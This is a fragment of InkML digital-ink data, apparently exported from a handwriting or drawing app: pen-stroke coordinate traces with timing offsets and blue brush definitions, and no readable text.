  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="49653">1754 6405,'2'0,"-3"0,1 0,0 0,0 0,-8 2,8-2,0 0,-18 1,18-1,-24 2,-7 5,31-7,0 0,0 0,-28 4,28-4,0 0,-18 10,18-10,-13 7,5 1,1 7,2 24,1-4,-5 14,1-2,2 23,-4-18,2 11,4 10,-6 4,5 9,-3 5,1 8,3-3,0 1,3 4,0 2,-3 15,-3 1,-3-13,5 16,3 12,1-19,5 29,-11-23,1 18,1-4,2 19,5-23,5 23,-3-24,2 25,-6-12,1 6,-4 3,-1-10,-4 5,-6-3,-2-11,3 8,3-17,6-17,8-13,-2-1,-11 4,-4 0,0-7,11 6,7-5,6-5,-6 2,-4 7,-3 6,-2 1,8-6,3 0,-3 0,-4-3,0-10,-1-23,2 12,-7 2,-5-18,8 9,-4-23,6-2,4-6,-3-15,1-2,4 6,1 5,1-12,-1-2,14 0,27 9,13-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="53484">1689 7962,'2'-4,"1"0,-3 4,0 0,0 0,-1-2,1 2,0 0,2-1,-2 1,13 1,36 3,-49-4,0 0,51-6,-51 6,59-1,12 11,-17-2,-20-10,-14 1,-4-3,-4-1,-2-3,-3-1,-3-8,-18-14,-3 11,-6 8,-17-8,1 4,16 16,13 3,9-1,9 3,26 19,11 1,0 14,-14-10,-15 8,-22-3,-29-6,-12-1,-23-3,-3-9,19 1,29 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="56009">5253 8976,'0'-1,"1"0,-1 1,0 0,0 0,1 0,-1 0,0 0,-1 0,1 0,-5-5,-17 0,22 5,0 0,0 0,-39-6,39 6,0 0,-40-1,40 1,-40-2,0 9,-15-2,-19-6,-8 1,5-5,5 1,9 7,2-5,-8 7,3 5,-9-10,-1-2,-8-3,-18 0,-3-2,9 15,10 11,1-6,-9-4,-9-11,-15-10,-15-13,-5 2,-11 8,-1 10,20 0,-10-3,16 9,8-1,21 7,30-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="58869">10126 10037,'-1'-10,"-1"-4,2 14,0 0,0 0,0 0,10-11,-10 11,0 0,0 0,38-10,-38 10,0 0,56-6,-56 6,56 4,7 7,21 15,-9 10,-17 6,-17 7,-15 10,-16 13,-6 12,-2 25,-2 30,14 24,3 10,10 7,-11-1,-5-2,-6 3,-5-29,-29-32,-15-41,-7-26,-14-24,-30-26,-38-17,-16-1,7 10,28 13,14 16,5 9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="67899">4663 7662,'6'-4,"-5"0,-1 4,0 0,0 0,0-3,0 3,0 0,-3 1,3-1,-12 7,-19 11,31-18,0 0,-52 16,52-16,-78 10,-10-5,4-8,-3-15,8 10,-2-6,24 15,20-4,16 2,12 3,4 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="77668">4855 10667,'7'0,"6"-2,-13 2,0 0,0 0,17-1,-17 1,0 0,23 1,-23-1,32 8,15 3,13-8,21 5,3-10,15 6,4-7,3-3,2 2,6-6,-1 9,7 3,-4-2,1 7,3 0,1 0,-4 0,0 3,1-5,-10-5,1 1,-9-2,10 1,-10-6,5-3,11 4,2 2,2 0,-3-1,-8 3,-3 5,-8 6,-13-5,-16-1,-14 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="79108">5723 11919,'-1'-4,"-3"3,4 1,0 0,0 0,0 0,-11 4,11-4,0 0,0 0,-23 7,23-7,0 0,-31 7,31-7,-57 6,-17 2,-16 2,-23-6,-16-8,-12 2,-12 1,-1 1,-3-2,5 0,-2-4,-3 2,5-2,-8 8,-3 4,1 0,5 1,8-8,2-4,11-3,19 9,1-2,25 1,24-2,27 3,14 3,19-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="92639">15422 1113,'26'-11,"-3"5,-23 6,0 0,0 0,17-5,-17 5,0 0,5 0,-5 0,-7 7,-21 5,28-12,0 0,0 0,0 0,-48 6,48-6,0 0,0 0,-59 2,59-2,0 0,-52 4,52-4,-42 8,6-1,-13 0,-11-10,-17-3,18 7,28 11,13 8,11 11,3 14,3 13,-12 10,0 15,-4 14,13 14,-2 15,-3 16,-3 15,1 11,-9 8,7 11,6 12,9 15,3 9,8 22,-4-7,-18 2,3-1,7 8,13 4,17 12,19 1,-16-2,-20-7,-6-3,4-5,13 3,10-3,-6-3,-1-12,-12-12,0-11,4-7,5-14,-5-4,2-10,-11-12,-6-12,-2-15,1-18,6-11,8-24,11-21,-1-14,5-20,-6-13,9-13,7-4,8 2,22 1,10 8,13 5,-2 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="94948">15964 2347,'40'-5,"22"-1,-62 6,72-5,11 5,10 6,7 6,-4 4,-28-3,-9-5,-14-1,-21-5,-25-6,-10-9,-15-10,-10-8,-2-6,2 9,1 8,8 9,17 7,10 4,6 5,20 13,15 6,4 8,-22 1,-18 4,-19 0,-11-3,-20-8,-22-4,11 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="98341">16620 3198,'-6'-2,"8"2,-2 0,0 0,8 4,-8-4,7 11,-19 4,12-15,0 0,0 0,-49 13,49-13,0 0,-76-2,76 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="99772">16564 3671,'8'-12,"4"7,-12 5,0 0,0 0,12 3,-12-3,0 0,14 9,-14-9,3 4,-8 0,5-4,0 0,0 0,0 0,0 0,-20 3,20-3,0 0,0 0,0 0,-34-4,34 4,0 0,0 0,-37-2,37 2,0 0,-45 0,45 0,-47 4,0 8,0 3,11 10,13 11,7 8,14 14,2 15,-1 14,13 16,-2 9,2 15,-9 7,4 0,1 10,8 5,9 8,3 7,-5-15,-6-2,-6-15,-8-3,6-2,8-8,14-10,8-6,-20-10,8-5,8-12,4-14,-14-17,-6-20,4-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="111972">17237 6855,'-13'24,"-8"19,21-43,-48 64,-15 8,-15 2,-9-8,21-4,6-18,27-17,27-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="112258">17482 6996,'-30'64,"-23"28,-17-5,-11-16,3-23,14-20,17-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="112768">17703 7228,'51'3,"-8"-9,-43 6,44-16,-7-21,-15-19,-19-2,-20 29,-25 17,11 27,12 42,23 32,22-7,22-15,11-32,-18-28,-7-33,-17-35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="113088">18202 7202,'23'54,"-18"-20,-5-34,0 0,0 0,6 14,-6-14,0 0,4-5,-4 5,8-37,12-12,-20 49,0 0,28-56,-28 56,24-34,14 31,1 31,6 23,-8-7,-13-4,-7-27</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="113533">18827 6998,'18'0,"-29"4,11-4,0 0,0 0,-38 25,38-25,0 0,-38 39,38-39,-18 66,24-3,24-11,16-37,1-35,-26-32,-27-56,-15-39,-18 24,7 63,19 28,14 33,20 53,11 54,23 24,3-23,-10-28,-10-44</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="114099">20143 6438,'0'-3,"-10"3,10 0,0 0,0 0,-22 7,22-7,0 0,-40 19,40-19,-57 22,-17 19,9 27,19 32,33 13,26 21,5 0,-3-35,-8-21,-11-22,-2-38</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="114298">19916 7065,'-29'-1,"-52"-8,81 9,-93-17,10-7,24 8</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="114666">20084 6977,'60'-4,"-57"6,-3-2,0 0,-33 26,33-26,-40 34,12 14,28-48,1 52,32-20,27-3,-8-24,-8-24,-20-6,-30-33,-23 1,10 2,17 17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="114891">20478 7075,'23'7,"-20"-10,-3 3,0 0,0 0,-3-34,3 34,0 0,-5-49,5 49,21-77,44-2,32 19,14 26,-6 33</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="117080">21587 6947,'39'-8,"6"-3,-45 11,84-33,19-3,24-15,13-13,15-28,5-20,-5-19,4-40,-21-15,-8 0,-9-9,-14-19,-14-9,-22-28,-4-12,-18-8,-1-27,-12 16,-2 10,-32 19,-35-17,-16 4,4 9,-1 32,-11 17,0 19,-7 25,1 25,18 26,0 29,1 29,12 10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="119320">21258 7872,'0'-22,"-31"1,31 21,0 0,-53-29,53 29,-59-22,-5-2,4 15,-10 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="119891">20894 7528,'-26'2,"12"4,14-6,0 0,0 0,-1 10,1-10,0 0,8 12,-8-12,21 11,0 13,-21-24,0 0,0 0,8 27,-8-27,0 0,-8 16,8-16,-36 29,-21-6,4 2,27-19,22-5,17 2,27 15,25 15,7 10,1 10,-9-3,-30-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="150656">3716 620,'-35'-40,"60"21,-25 19,0 0,0 0,37-22,-37 22,0 0,-3-21,3 21,51-27,-34-5,85 12,36 7,-86 30,6 16,17 22,11 23,-69 12,38 8,-10-10,-73-15,-27-11,-7-4,-31-22,-31-12,-24-17,23-30,30-27,29-37,28-29,34-148,96 158,36 36,76 39,-21 35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="183682">22292 3757,'14'-2,"-8"-10,-6 12,0 0,0 0,4-23,-4 23,0 0,3-15,-3 15,-2-1,-14 12,16-11,0 0,0 0,-37 18,37-18,0 0,-51 6,51-6,-70-23,1-7,-1-18,-2 13,8-9,-1 21,-1 20,3 16,6 2,4-2,-8 8,-8-16,-2-12,-7-9,-1 2,-1 4,-3-9,-7 2,-12-6,8-2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="200017">9761 4612,'4'-6,"-3"3,-1 3,0 0,0 0,0 0,0 0,0 0,-1-1,1 1,0 0,0 0,0 0,0 0,-10 3,10-3,0 0,0 0,0 0,-21 9,21-9,0 0,0 0,-44 28,44-28,0 0,-45 35,45-35,-28 41,16 6,12-1,25-10,10-8,5-9,-7-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="200366">10030 4717,'-26'0,"-9"10,35-10,0 0,-36 27,36-27,-33 41,13 4,33-5,22-16,13-19,-10-20,-7-23,-24-16,-23 9,-16 17,-2 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="200769">10042 4296,'0'13,"17"38,-17-51,35 97,2 48,-6-1,-11-32,-4-37,3-32,-8-35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="201038">10266 4375,'10'10,"5"43,-15-53,19 95,-15 31,3-13,5-18,0-30,-1-23,-2-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="201619">10664 4809,'12'-10,"-33"-6,21 16,0 0,0 0,-37-17,37 17,0 0,-48-8,48 8,-43 8,14 18,21 8,13-15,4-13,-2-4,-3-4,2 1,11 2,12 3,6 5,-6 0,6-4,-13-6,-3-10,-16-8,-5-9,-1 17,3 12,6 31,-2 27,5 10,-9-5,0-19,2-31,-5-15,-9-36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="201889">10823 4447,'15'16,"-1"43,-14-59,19 93,-7 40,2 3,0-34,7-36,2-36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="202057">10987 4907,'-23'-22,"-27"4,50 18,-63-10,-11 3,17 14,32-3,16 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="202424">10993 4830,'26'-7,"-12"-2,-14 9,0 0,0 0,26-18,-26 18,0 0,27-18,-27 18,30-7,5 18,-8 15,-19 11,-14 12,-22 12,-6 8,17-15,31-23,11-10,8-17,-5-12,-3-15</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="202860">11536 5054,'-19'-12,"-8"10,27 2,0 0,0 0,-42 11,42-11,0 0,-44 19,44-19,-36 19,1 0,9-17</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="203253">11753 4776,'-7'-2,"-24"0,31 2,0 0,-46 14,46-14,-47 29,18 9,22-8,31-9,18-8,14-2,-5 3,-13 23,-24 13,-32-5,-23-16,-4-19,10-32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="203496">11778 4517,'32'-2,"-7"33,-25-31,0 0,20 75,-20-75,20 100,-16 12,2-9,6-11,3-41,6-37</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="203662">11961 4918,'-34'-9,"-15"5,49 4,-54-1,4 10,20-1,21-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="203982">12017 4982,'45'6,"-5"-11,-40 5,0 0,0 0,22-14,-22 14,0 0,7-27,-7 27,-6-37,-12 5,-2 15,7 18,1 26,2 15,7 11,2-2,21-13,7-14,1-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="204381">12273 5084,'11'67,"-9"12,-9-9,3-24,1-40,7-24,-7-50,2-31,5-4,-4 22,13 29,16 29,0 23,8 36,-22 27,-32-3,-29-19,-21-17,29-25,35-23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="204731">12536 4887,'14'5,"-19"14,5-19,0 0,0 0,-28 26,28-26,0 0,-35 31,35-31,-20 37,13-14,32-10,13-11,13-6,-3 6,-12 13,-6 11,-28 16,-29-2,-26-19,-10-18,17-14</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="205121">13207 4427,'-11'8,"-6"10,17-18,0 0,-26 38,26-38,-36 51,-18 28,-9 20,25 15,33 1,35-26,19-30,-5-25,-3-22,2-24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="205471">13422 4731,'-3'-19,"-26"2,29 17,0 0,0 0,-41 10,41-10,0 0,-35 43,35-43,-26 75,21 14,36-32,25-20,-2-37,-13-31,-22-32,-25-22,-27 17,5 23</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="205714">13485 4459,'40'18,"13"38,-53-56,53 83,-23 29,-14 10,-31 4,-23 8,-18-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="206479">9937 5491,'-26'3,"-13"14,39-17,0 0,-44 31,44-31,-46 55,15-1,31-6,32-18,25-11,2-20,5-20</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="206771">10173 5529,'-20'19,"-10"12,30-31,0 0,-33 42,33-42,-24 50,34-9,24-17,18-19,-2-21,-13-17,-7-20,-34-4,-22 7,-5 2</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="206999">10207 5256,'32'4,"-13"40,-19-44,0 0,10 70,-10-70,5 103,2 7,3-18,7-34,4-42,6-39,2-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="207197">10439 5306,'4'8,"4"41,-8-49,0 0,9 72,-9-72,4 91,2 7,9-18,6-21,15-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="207566">10776 5626,'-9'-15,"-37"4,46 11,0 0,0 0,-42 7,42-7,0 0,-30 37,30-37,-7 57,14-13,10-19,11-21,4-21,-7-14,-3-2,-2 25,13 31,-10 22,-6-1,-8-7,-11-22,5-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="207808">10853 5314,'29'42,"12"29,-41-71,31 93,-13 6,-5-9,-5-22,9-43,-3-34</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="207963">11038 5709,'-10'-40,"-16"18,26 22,0 0,-41-13,41 13,-67 0,7 1,25 13,19 2,21-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="208270">11100 5622,'52'-9,"-13"-6,-39 15,0 0,33-18,-33 18,15-7,-3 9,-4 19,-11 20,-8 10,-1 8,5-9,13-18,9-13,3-12,14-6,3-10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="208499">11721 5832,'-3'-4,"-28"-9,31 13,0 0,-72-14,72 14,-76-5,14 13,14 1,23-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="208729">12010 5665</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209038">11890 5627,'-18'-12,"-6"7,-7 25,-3 17,13 8,19-9,22-14,8-8,7-4,-2 6,-5 10,-8 17,-8-3,-20-12,-28-12,-10-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209297">11957 5407,'33'23,"-16"47,-17-70,15 96,-4 20,-4-20,-9-19,6-27,2-32</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209464">12076 5748,'-9'-7,"-17"6,26 1,0 0,-51 9,51-9,-62 17,20 8,31 0</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="209757">12078 5886,'91'16,"-8"-16,-19-18,-21-23,-33-8,-39-3,-16 22,8 30,12 30,10 31,19 10,10-5,12-20,12-20,-5-29</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210141">12490 5969,'20'75,"-6"-1,-14-8,-9-18,4-35,-4-27,-4-45,11-33,12-23,5 12,3 40,5 39,6 38,-4 13,-24 27,-28 3,-20-6,4-22,20-28,24-21</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210481">12721 5765,'3'7,"-16"20,13-27,0 0,0 0,-23 33,23-33,0 0,-18 37,18-37,2 27,19-12,16-13,4-15,-5 8,-12 15,-8 13,-26 17,-13-9,-5-14,-8-7,27-26</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="210802">13178 5534,'-9'-2,"-12"15,21-13,0 0,-30 45,30-45,-44 70,-12 24,24 9,41-15,32-27,14-26,2-27,5-28</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="211091">13437 5575,'10'62,"-4"13,-7 4,-5 1,7-20,2-27,-1-23,1-22</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="211373">13562 5481,'16'-36,"-1"31,-15 5,0 0,45 22,-45-22,64 63,-15 30,-22 10,-34 14,-22-7,-24-12,-37-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="211793">10689 6624,'-36'-37,"13"12,23 25,0 0,0 0,0 0,0 0,-6-9,6 9,0 0,0 0,0 0,0 0,0 0,0 0,0 0,3 10,-3-10,0 0,4 25,-4-25</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="211927">10748 6859,'-2'13,"-3"-6,5-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="212127">10737 7000,'7'6,"-9"-2,2-4,0 0,0 1,5 11</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="225218">7023 11613,'12'-11,"-16"5,4 6,0 0,0 0,-27-5,27 5,0 0,-53 0,53 0,-74 4,-7 1,-11 1,11-4,7-12,32 6,12-2,19 6,4 1,-5 3,-13-3,-3-3,0-2,3-3,16 4,9 1,4-4,9-10,11-9,7 2,7 2,2 5,-13 9,-21 6,-10 9,-13 16,-21 13,-7 1,-3 5,30 4,39-4,60 8,25 5,-13-9</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="267487">22134 2740,'16'6,"-5"-4,-11-2,0 0,0 0,-4 6,4-6,0 0,-31 17,31-17,-60 16,-27-16,-27-4,0-8,-8-5,-7 1,4 5,2 10,37 8,21 7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="270498">22996 2424,'-5'5,"-4"2,9-7,0 0,0 0,-15 13,15-13,0 0,-29 8,29-8,-50 6,1-8,14 2,12-4,6 4,-1-3,-12-3,2-9,8 6,13 4,10-2,12-11,1 2,-2 0,-3-7,15-10,-4 15,10 16,1 12,-23-3,-17 10,-19 5,-12-1,-8 8,5 0,23-7,15 9,11-4,26 11,14 6,21 6,-4 13</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="273960">6594 8602,'-15'24,"-22"-3,37-21,0 0,-66 9,66-9,-68 1,-20-11,-9-1,-1 1,7-7,8 5,24 5,15-1,25 2,19-4,13-7,27-6,10-2,5-2,-14 8,-26 13,-16 8,-10 14,-28 27,-10 13,15 6,43 13,46 2,24-19</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="293446">19647 4305,'-6'-2,"-8"-2,14 4,0 0,0 0,-28-9,28 9,0 0,-33-5,33 5,-32 5,-4 16,-3 3,-7 0,-2-11,-13-14,-4-5,-20-10,-8-1,3 10,16 6,18 10,-2 10,-4-12,-8 0,-6-6,-3-6,-1-5,-15 2,-5-1,-6 1,8-1,-2 16,6-2,-12 3,6-4,1 0,7-7,7-1,15 0,11 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="295899">18829 5878,'-46'-18,"0"0,46 18,-45-10,-10 6,-16-3,-23 4,-15-2,-17-3,-5-8,-13-3,-1 1,14 7,26-1,37 4,43 2,23-1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="303726">19389 5218,'19'-2,"-11"1,-8 1,0 0,0 0,4-2,-4 2,0 0,6-5,-6 5,8-7,5-7,-13 14,0 0,0 0,27-20,-27 20,0 0,31-16,-31 16,47-25,8 7,20-8,6 7,5 0,5-8,0 20,11-6,-7 11,3-3,-1 2,-1 9,4 9,-5 2,0 13,-9 11,-10 10,-10 16,-10 19,-17-2,-12 10,-16 22,-17-10,-13-5,-11 0,-14-9,-26 9,-16-25,-14-4,-14-19,-3-16,-6-21,-8-12,-7-14,-5-9,13-13,13-9,14-17,20-14,11-5,10-18,21 2,12-6,17-4,8-5,8-4,19 15,24 3,20 23,28 12,40 11,25 20,38 36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="322228">20267 5726,'0'-3,"-1"5,1-2,0 0,0 0,3 14,-3-14,0 0,10 37,-10-37,46 74,21 6,23-18,26-5,19-16,-38-16,-61-11,-41-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="323049">21356 6217,'2'43,"-1"14,-1-57,4 58,5 1,-3-46,-6-12,-3-13,-11-54,-3-8,14 3,19 31,9 24,18 35,14 36,-7-3,-28-14,-11-30,-5-33,-11-20,0-28,8-3,16 38,16 35,9 42,-7 5,-19 22,-9-35</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="323651">21976 6016,'3'7,"-35"23,32-30,0 0,-53 24,53-24,-68 44,25 21,35-31,39 4,17-35,-3-28,-17 3,-8-41,-9 7,-14 27,6 26,14 24,-3 23,3 7,-13-17,-2-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="323966">22187 5840,'4'15,"-10"13,6-28,0 0,0 37,0-37,-11 63,3 14,12-2,7-24</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="324194">22289 6173,'12'-3,"-11"3,-1 0,0 0,0 0,-5-2,5 2,0 0,-29-13,29 13,-58-21,-19-8,3-11,9 4,11 3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="324538">22625 5709,'0'3,"-21"11,21-14,0 0,0 0,-47 18,47-18,0 0,-59 8,59-8,-57 5,12 13,24-4</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="324914">22781 5484,'6'12,"-11"32,5-44,0 0,-15 42,15-42,-1 76,27-1,29-30,-7-18,-10-7,-12-36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="325105">22723 5248,'0'-12,"-11"-11,11 23,0 0,-21-36,21 36</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="365237">10636 9594,'9'1,"-6"1,-3-2,0 0,0 0,3 5,-3-5,0 0,11 10,-11-10,22 18,14 14,-36-32,46 43,5 13,-6 12,-3 14,-8 15,10 15,-2 10,-14 5,-10 4,-15 10,-24 4,4 12,9 1,7-4,3-15,-16-7,-27-16,-18-20,-1-21,24-23,19-13,28-15,-3-12</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="392314">15882 9151,'-11'45,"-33"17,44-62,-62 54,-9-6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="393405">8335 6204,'-7'-34,"-14"8,21 26,0 0,0 0,-26-14,26 14,0 0,-40 1,40-1,-69 25,-13 11,-4 8,0 12,7 5,12-2,21-4,22-5,7-16,9-12,7-16,1-4,6-8,20-24,12-19,-16 1</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="393695">7629 6336,'-4'26,"7"22,-3-48,0 0,11 52,-11-52,24 55,-4-2,-3-14,1-3,31-16,58-14,30-15,35 3</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="406777">16691 3220,'-4'-16,"-1"-8,5 24,0 0,0 0,0 0,0 0,-11-23,11 23,0 0,0 0,0 0,-3-5,3 5,0 0,0 0,-2 3,2-3,0 0,-7 23,7-23,-22 25,-26-5,48-20,-64 9,-13-11,-19-8,-21-3,0 9,-1 5,4 4,9 1,14-6,21-2,13-1,21-6,19-1</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7:59:43.664"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">5952 5536,'1'-1,"1"1,-2 0,0 0,0 0,15-3,-15 3,0 0,37-6,-37 6,57 2,35 2,15 13,11 2,9-5,8 0,9 3,10-4,22-8,2-5,3 5,10 6,24 3,11 1,0-3,-21-1,-24-5,-12-4,-32-7,-47-2,-41 0,-44 2,-37-5,-59-2,-59-1,-68-5,-69 12,-66-5,-13-8,-6 0,13 2,21 6,47 17,49 5</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="33104">15100 9862,'15'-13,"19"4,-34 9,0 0,69-7,-69 7,85-11,26-1,17 8,16 2,16 4,16-2,12 0,13 7,-3 3,16 7,5-2,0 4,4-6,-3 13,17 3,-2 3,2 3,-12-5,-5-9,0-10,9-3,-1 2,7-13,-11 4,1-3,0-5,-9-2,6-3,-12-10,-16 4,-9 0,-14 8,-31-1,-18 9,-28 9,-43-5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1:12.227"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05292" units="cm"/>
      <inkml:brushProperty name="height" value="0.05292" units="cm"/>
      <inkml:brushProperty name="color" value="#0070C0"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">10975 5714,'18'-17,"-9"-4,-9 21,0 0,0 0,0 0,0 0,2-25,-2 25,0 0,0 0,0 0,2-27,-2 27,0 0,0 0,0-16,0 16,0 0,-9-12,9 12,-28-14,-33-5,-33 8,-2 6,-1 13,-6 18,6 4,-11-2,4-10,-1-11,4-13,-18-17,-19-10,-17 14,12 21,9 7,0 4,-7 0,3-2,-11-10,-19-4,-1-4,-11-5,14-1,3 4,-1 4,-7 1,10-6,16-4,22-7,0 4,9 11,-1 8,4 3,19 5,20-10</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="1310">3169 5387,'-32'8,"-13"-1,45-7,-60 3,-26 13,-18-17,-21 12,-4 1,8-8,-5 0,19-7</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="4443">21271 2399,'-6'3,"-3"10,9-13,0 0,-13 50,13-50,-21 68,2 24,6 31,21 11,7 9,2-1,3-11,-16-17,2-32,-6-40</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="5593">21257 2640,'14'-9,"7"8,-21 1,0 0,52-1,-52 1,63-11,27-3,3 4,27-18,17 9,23 1,11 13,29 3,14-2,-4 9,0-1,5-12,-8 13,-10 7,-18-13,-28-4,-41 3,-45 1,-33-8,-22 3,-8 5,-7 13,-4 19,-7 40,-5 31,10 18,2 31,16 3,-4-14,-13-12,-8-56,-4-32,-19-16,-20-39,-8-11,-18-16,-8 13,-12 18,-9 3,-20 12,-18 2,-22-19,-18-6,-5 24,3-8,-8 24,7-15,0 7,25-27,26-5,16 2,22 6</inkml:trace>
  <inkml:trace contextRef="#ctx0" brushRef="#br0" timeOffset="7153">19337 4875,'-25'19,"-28"17,53-36,-79 65,-11-4,-11 2,11-4,10-3,24-10,17-21,3-18</inkml:trace>
